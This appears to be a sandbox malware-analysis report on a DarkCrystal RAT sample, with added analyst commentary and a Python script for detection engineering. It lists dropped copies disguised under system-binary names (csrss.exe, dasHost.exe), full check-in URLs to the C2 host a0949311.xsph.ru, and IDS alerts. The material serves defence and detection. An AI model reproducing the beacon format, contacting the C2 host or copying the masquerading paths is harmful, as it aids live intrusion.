Dropped files

Every row below was written by PID 6520, bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exe.

Filename | Type | MD5 | SHA256
C:\found.000\dir_00000002.chk\21b1a557fd31cc | text | FC10A21E5766D81E09FB96219A2DD9B2 | 08DF1B95DEDFD58E5D0968B54E3C471884EE16DA9FA757B4B02C02926B1B6DC5
C:\found.000\dir0000.chk\27d1bcfc3c54e0 | text | 215E403362744B7A9C11721A1E243837 | 5EC08DD077D3403B5B05AD7AC9DE65CCD6E52EED0A1901EE696974E5AB2CF1F8
(filename, type and hashes blank in the report) | | |
C:\found.000\dir_00000002.chk\dasHost.exe | executable | D1BFFB7DFD0CCFE6AA48313B65C2EB11 | BC65E00E7CFB6F9DE5C996B3D60DFF8012DB0217A5AFD288DC1F29C53EB76DA6
C:\Recovery\Logs\SystemSettings.exe | executable | D1BFFB7DFD0CCFE6AA48313B65C2EB11 | BC65E00E7CFB6F9DE5C996B3D60DFF8012DB0217A5AFD288DC1F29C53EB76DA6
C:\Users\Public\Pictures\886983d96e3d3e | text | 30D021F1052A6FB16DF182717C1FBF58 | 0CDCE18C2A24BBB91A7CCFA579A1CB400437A198F8FF3F11557F93D9D282AFB8
C:\found.000\dir0000.chk\System.exe | executable | D1BFFB7DFD0CCFE6AA48313B65C2EB11 | BC65E00E7CFB6F9DE5C996B3D60DFF8012DB0217A5AFD288DC1F29C53EB76DA6
C:\Users\Public\Pictures\csrss.exe | executable | D1BFFB7DFD0CCFE6AA48313B65C2EB11 | BC65E00E7CFB6F9DE5C996B3D60DFF8012DB0217A5AFD288DC1F29C53EB76DA6
C:\Windows\addins\257bc9927e0626 | text | B18B8F8CDC9E87C1655056E0C0EF5B27 | 3A951A8570B008CF1FCA0CAF87E928725D1FFB4DB02740DFC5723C8ACBE87B65
C:\Windows\Offline Web Pages\9e8d7a4ca61bd9 | text | 7BB04C9B21A8A07E3CB1771FE47584BA | D5B43B0B560B0B5E1D9C70740EFCA2BE5D2A33191E6FADD79861E76458D1CB85

All four executables shown (dasHost.exe, SystemSettings.exe, System.exe, csrss.exe) carry the sample's own MD5 and SHA256, so they are byte-identical copies of the dropper placed under system-binary names in a chkdsk recovery folder (C:\found.000), C:\Recovery\Logs and C:\Users\Public\Pictures. Each copy has a small text file with a random 14-character hex name beside it in the same directory (21b1a557fd31cc next to dasHost.exe, 27d1bcfc3c54e0 next to System.exe, 886983d96e3d3e next to csrss.exe, 257bc9927e0626 in C:\Windows\addins where the RUXIMICS.exe task points); the report does not show their contents. The report counts 32 dropped executables in total and lists only these rows, which is why the task target C:\found.000\dir0001.chk\csrss.exe does not appear here. Hunting for the file hash alone finds every copy; hunting for the file names does not, since the copies take the names of genuine binaries.
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
22
TCP/UDP connections
29
DNS requests
5
Threats
11

HTTP requests

PID | Process | Method | HTTP code | IP | URL | (remaining columns)
2392 | svchost.exe | GET | 200 | 2.16.164.82:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown, unknown
7196 | dasHost.exe | GET | 403 | 141.8.192.82:80 | http://a0949311.xsph.ru/_Defaultwindows.php?hsUTkWeMunIKFod=fTsIy&SRaOxN4ld5K0OmuZz5=LXlmG6&j7kEu1n8ZD2ViQ=JJNAOa0VGe&d25768f30c698c24efd3caf1c2a93bcb=7f778e433ec7c51341864efceb684f99&d10d153e77fe36211bd0a60ff3c00895=AOxETZxMWN1YDO2YjYiVGN1YzM2UWZiFjZwIWYxIDZlZDO0cTYjRGZ&hsUTkWeMunIKFod=fTsIy&SRaOxN4ld5K0OmuZz5=LXlmG6&j7kEu1n8ZD2ViQ=JJNAOa0VGe | unknown, unknown
2304 | dasHost.exe | GET | 403 | 141.8.192.82:80 | http://a0949311.xsph.ru/_Defaultwindows.php?9gOcAJBzR0suqq=3OWG0lVxc0VgSI3QWn&PbU1Vz9EVgH64UAug40Hyotwl=msqXjWH2aGiWBQ0h9RV4b&RYXWff9l=iPqNQX86uzB34LJ2jQQocbr&d25768f30c698c24efd3caf1c2a93bcb=7f778e433ec7c51341864efceb684f99&d10d153e77fe36211bd0a60ff3c00895=AOxETZxMWN1YDO2YjYiVGN1YzM2UWZiFjZwIWYxIDZlZDO0cTYjRGZ&9gOcAJBzR0suqq=3OWG0lVxc0VgSI3QWn&PbU1Vz9EVgH64UAug40Hyotwl=msqXjWH2aGiWBQ0h9RV4b&RYXWff9l=iPqNQX86uzB34LJ2jQQocbr | unknown, unknown
308 | dasHost.exe | GET | 403 | 141.8.192.82:80 | http://a0949311.xsph.ru/_Defaultwindows.php?iKeQE9sE=pyqznDYRJSArLABVXhA6ShR5n7ko&xkq69oi=vDb972FegXKd5qcrIlHgvMpdu&d25768f30c698c24efd3caf1c2a93bcb=7f778e433ec7c51341864efceb684f99&d10d153e77fe36211bd0a60ff3c00895=AOxETZxMWN1YDO2YjYiVGN1YzM2UWZiFjZwIWYxIDZlZDO0cTYjRGZ&iKeQE9sE=pyqznDYRJSArLABVXhA6ShR5n7ko&xkq69oi=vDb972FegXKd5qcrIlHgvMpdu | unknown, unknown
308 | dasHost.exe | GET | 403 | 141.8.192.82:80 | (same URL as the previous row; a second attempt) | unknown, unknown
324 | dasHost.exe | GET | 403 | 141.8.192.82:80 | http://a0949311.xsph.ru/_Defaultwindows.php?wEg=qLy4JwBXMYQ12BGdjLelXVBr3&GsJYfZQ=xnQF90AfCPeNnYz5ckk5XUKHA8pTN&d25768f30c698c24efd3caf1c2a93bcb=7f778e433ec7c51341864efceb684f99&d10d153e77fe36211bd0a60ff3c00895=AOxETZxMWN1YDO2YjYiVGN1YzM2UWZiFjZwIWYxIDZlZDO0cTYjRGZ&wEg=qLy4JwBXMYQ12BGdjLelXVBr3&GsJYfZQ=xnQF90AfCPeNnYz5ckk5XUKHA8pTN | unknown, unknown
324 | dasHost.exe | GET | 403 | 141.8.192.82:80 | (same URL as the previous row; a second attempt) | unknown, unknown
2916 | RUXIMICS.exe | GET | 200 | 2.16.164.82:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown, unknown
5140 | MoUsoCoreWorker.exe | GET | 200 | 2.16.164.82:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown, unknown
5140 | MoUsoCoreWorker.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown, unknown

The two trailing "unknown" values per row are what survived of the CN, Type, Size and Reputation columns. Every check-in to a0949311.xsph.ru (141.8.192.82) answered HTTP 403, so the C2 was reachable but rejected the beacon and no tasking was received during the run. All the beacons share one shape: a few random key=value pairs, then two fixed parameters whose names are 32-character hex strings (d25768f30c698c24efd3caf1c2a93bcb=7f778e433ec7c51341864efceb684f99 and d10d153e77fe36211bd0a60ff3c00895=AOxETZxMWN1YDO2YjYiVGN1YzM2UWZiFjZwIWYxIDZlZDO0cTYjRGZ) that are identical across all four dasHost.exe instances, then the same random pairs repeated. The fixed pair is the part worth matching on; the random keys differ per instance and per run. The crl.microsoft.com and www.microsoft.com requests are certificate-revocation-list fetches by Windows components; the report does not show the image path of PID 2916, so whether it is the genuine RUXIMICS.exe or the copy scheduled from C:\Windows\addins cannot be settled from this page, though its traffic matches the genuine component.
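Taking the beacon URLs apart mechanically shows which part of the query string is signal and which is filler, which is what a detection engineer needs before writing a rule. The script below is an added example, not code from the ANY.RUN report or from DCRat: it embeds the three distinct beacon URLs from the table above, separates the parameters that are constant across instances from the per-instance random keys (those are the ones repeated at the end of each URL), and tries one decoding on each fixed value, base64 written backwards, which it verifies by reversing and decoding. The report does not say what the resulting 40-character hex string identifies; treating it as a host identifier is an assumption.

```python
"""Separating the fixed part of DCRat's check-in URL from its random padding.

Added example; not code from the ANY.RUN report or from DCRat. The URLs are
copied from the HTTP requests table. The only assumption is the decoding
tried on each fixed value (reverse, then base64); what the decoded string
identifies is not stated in the report.
"""
import base64
import binascii
from collections import Counter
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qsl, urlsplit

BEACONS = [
    # PID 7196
    "http://a0949311.xsph.ru/_Defaultwindows.php?hsUTkWeMunIKFod=fTsIy&SRaOxN4ld5K0OmuZz5=LXlmG6&j7kEu1n8ZD2ViQ=JJNAOa0VGe&d25768f30c698c24efd3caf1c2a93bcb=7f778e433ec7c51341864efceb684f99&d10d153e77fe36211bd0a60ff3c00895=AOxETZxMWN1YDO2YjYiVGN1YzM2UWZiFjZwIWYxIDZlZDO0cTYjRGZ&hsUTkWeMunIKFod=fTsIy&SRaOxN4ld5K0OmuZz5=LXlmG6&j7kEu1n8ZD2ViQ=JJNAOa0VGe",
    # PID 2304
    "http://a0949311.xsph.ru/_Defaultwindows.php?9gOcAJBzR0suqq=3OWG0lVxc0VgSI3QWn&PbU1Vz9EVgH64UAug40Hyotwl=msqXjWH2aGiWBQ0h9RV4b&RYXWff9l=iPqNQX86uzB34LJ2jQQocbr&d25768f30c698c24efd3caf1c2a93bcb=7f778e433ec7c51341864efceb684f99&d10d153e77fe36211bd0a60ff3c00895=AOxETZxMWN1YDO2YjYiVGN1YzM2UWZiFjZwIWYxIDZlZDO0cTYjRGZ&9gOcAJBzR0suqq=3OWG0lVxc0VgSI3QWn&PbU1Vz9EVgH64UAug40Hyotwl=msqXjWH2aGiWBQ0h9RV4b&RYXWff9l=iPqNQX86uzB34LJ2jQQocbr",
    # PID 308
    "http://a0949311.xsph.ru/_Defaultwindows.php?iKeQE9sE=pyqznDYRJSArLABVXhA6ShR5n7ko&xkq69oi=vDb972FegXKd5qcrIlHgvMpdu&d25768f30c698c24efd3caf1c2a93bcb=7f778e433ec7c51341864efceb684f99&d10d153e77fe36211bd0a60ff3c00895=AOxETZxMWN1YDO2YjYiVGN1YzM2UWZiFjZwIWYxIDZlZDO0cTYjRGZ&iKeQE9sE=pyqznDYRJSArLABVXhA6ShR5n7ko&xkq69oi=vDb972FegXKd5qcrIlHgvMpdu",
]


def query_pairs(url: str) -> List[Tuple[str, str]]:
    """Query parameters in order, duplicates kept, so the padding stays visible."""
    return parse_qsl(urlsplit(url).query, keep_blank_values=True)


def padding_keys(url: str) -> List[str]:
    """Keys that occur more than once in a single URL: the random filler."""
    counts = Counter(k for k, _ in query_pairs(url))
    return sorted(k for k, n in counts.items() if n > 1)


def stable_params(urls: List[str]) -> Dict[str, str]:
    """Parameters present with the same value in every beacon."""
    per_url = [dict(query_pairs(u)) for u in urls]
    common = set(per_url[0]).intersection(*(set(d) for d in per_url[1:]))
    return {k: per_url[0][k] for k in sorted(common)
            if all(d[k] == per_url[0][k] for d in per_url)}


def decode_reversed_b64(value: str) -> bytes:
    """Reverse the string, restore '=' padding, decode with a strict alphabet."""
    s = value[::-1]
    s += "=" * (-len(s) % 4)
    return base64.b64decode(s, validate=True)


def as_hex_text(raw: bytes) -> Optional[str]:
    """The bytes as text if they spell an even-length lowercase hex value."""
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    ok = bool(text) and len(text) % 2 == 0 and all(c in "0123456789abcdef" for c in text)
    return text if ok else None


def extract(urls: List[str]) -> Dict[str, Optional[str]]:
    """For each fixed parameter: its reversed-base64 decoding if that yields hex text."""
    result: Dict[str, Optional[str]] = {}
    for key, value in stable_params(urls).items():
        try:
            result[key] = as_hex_text(decode_reversed_b64(value))
        except binascii.Error:      # not valid base64 even after reversing
            result[key] = None
    return result


if __name__ == "__main__":
    print("random padding in beacon 1:", padding_keys(BEACONS[0]))
    for key, decoded in extract(BEACONS).items():
        print(f"{key} -> {decoded}")
```

Only the second fixed parameter survives the decoding test; it reverses and base64-decodes to the 40-character hex string ddca7486ed21ab0f1bee63654ebb668655c1e118, while the first one (7f778e433ec7c51341864efceb684f99) is plain hex that does not decode to text. A network signature built on the host name plus the two fixed parameter names holds across instances; one built on the random keys would match a single process once.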

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
(none recorded) | (none recorded) | 239.255.255.250:1900 | | | | unknown
2392 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
5140 | MoUsoCoreWorker.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
2916 | RUXIMICS.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
2392 | svchost.exe | 2.16.164.82:80 | crl.microsoft.com | Akamai International B.V. | NL | unknown
5140 | MoUsoCoreWorker.exe | 2.16.164.82:80 | crl.microsoft.com | Akamai International B.V. | NL | unknown
2916 | RUXIMICS.exe | 2.16.164.82:80 | crl.microsoft.com | Akamai International B.V. | NL | unknown
5140 | MoUsoCoreWorker.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | unknown
2392 | svchost.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | unknown
(none recorded) | (none recorded) | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown

The 239.255.255.250:1900 entry is SSDP multicast from the guest itself. The report counts 29 TCP/UDP connections and shows these ten; the C2 connection to 141.8.192.82:80 (a0949311.xsph.ru) is recorded in the HTTP requests and DNS sections but falls outside the rows shown here.

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 2.16.164.82
  • 2.16.164.96
  • 2.16.164.81
  • 2.16.164.48
  • 2.16.164.97
  • 2.16.164.67
  • 2.16.164.83
  • 2.16.164.88
  • 2.16.164.43
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
settings-win.data.microsoft.com
  • 4.231.128.59
whitelisted
a0949311.xsph.ru
  • 141.8.192.82
unknown
self.events.data.microsoft.com
  • 20.189.173.26
whitelisted

Threats

PID | Process | Class | Message
2184 | svchost.exe | Misc activity | ET INFO Observed DNS Query to xsph .ru Domain
7260 | dasHost.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET)
7260 | dasHost.exe | A Network Trojan was detected | REMOTE [ANY.RUN] DarkCrystal HTTP GET Request
7260 | dasHost.exe | A Network Trojan was detected | REMOTE [ANY.RUN] DarkCrystal HTTP GET Request
7724 | dasHost.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET)
5656 | dasHost.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET)
(not recorded) | (not recorded) | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET)
(not recorded) | (not recorded) | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET)
(not recorded) | (not recorded) | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET)
(not recorded) | (not recorded) | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET)
(not recorded) | (not recorded) | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET)

Eleven alerts in total, matching the "Threats: 11" count above; the last five rows lack PID and process in the extracted report.